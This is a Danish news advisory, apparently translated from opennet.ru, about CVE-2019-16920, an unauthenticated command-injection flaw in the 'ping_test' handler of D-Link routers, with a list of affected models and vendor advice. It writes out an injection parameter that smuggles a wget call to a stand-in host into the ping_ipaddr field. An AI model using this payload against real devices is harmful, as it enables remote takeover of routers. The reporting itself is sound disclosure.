Fjernudnyttelig sårbarhed i D-Link-routere

I D-Link trådløse routere identificeret farlig sårbarhed (CVE-2019-16920), som giver dig mulighed for eksternt at udføre kode på enhedssiden ved at sende en speciel anmodning til "ping_test"-handleren, tilgængelig uden godkendelse.

Interessant nok skal "ping_test"-kaldet ifølge firmwareudviklerne kun udføres efter godkendelse, men i virkeligheden kaldes det under alle omstændigheder, uanset om du logger ind på webgrænsefladen. Især når man får adgang til scriptet apply_sec.cgi og sender parameteren "action=ping_test", omdirigerer scriptet til godkendelsessiden, men udfører samtidig handlingen forbundet med ping_test. For at udføre koden blev der brugt en anden sårbarhed i selve ping_test, som kalder ping-værktøjet uden at kontrollere rigtigheden af ​​den IP-adresse, der blev sendt til test. For at kalde værktøjet wget og overføre resultaterne af kommandoen "echo 1234" til en ekstern vært, skal du blot angive parameteren "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Fjernudnyttelig sårbarhed i D-Link-routere

Tilstedeværelsen af ​​sårbarheden er officielt bekræftet i følgende modeller:

  • DIR-655 med firmware 3.02b05 eller ældre;
  • DIR-866L med firmware 1.03b04 eller ældre;
  • DIR-1565 med firmware 1.01 eller ældre;
  • DIR-652 (ingen information om problematiske firmwareversioner er givet)

Supportperioden for disse modeller er allerede udløbet, så D-Link Han udtalte, som ikke vil frigive opdateringer til dem for at eliminere sårbarheden, anbefaler ikke at bruge dem og råder til at erstatte dem med nye enheder. Som en sikkerhedsløsning kan du begrænse adgangen til webgrænsefladen til kun pålidelige IP-adresser.

Det blev senere opdaget, at sårbarheden også var påvirker modellerne DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 og DIR-825, planer om at udgive opdateringer, som endnu ikke er kendt.

Kilde: opennet.ru

Tilføj en kommentar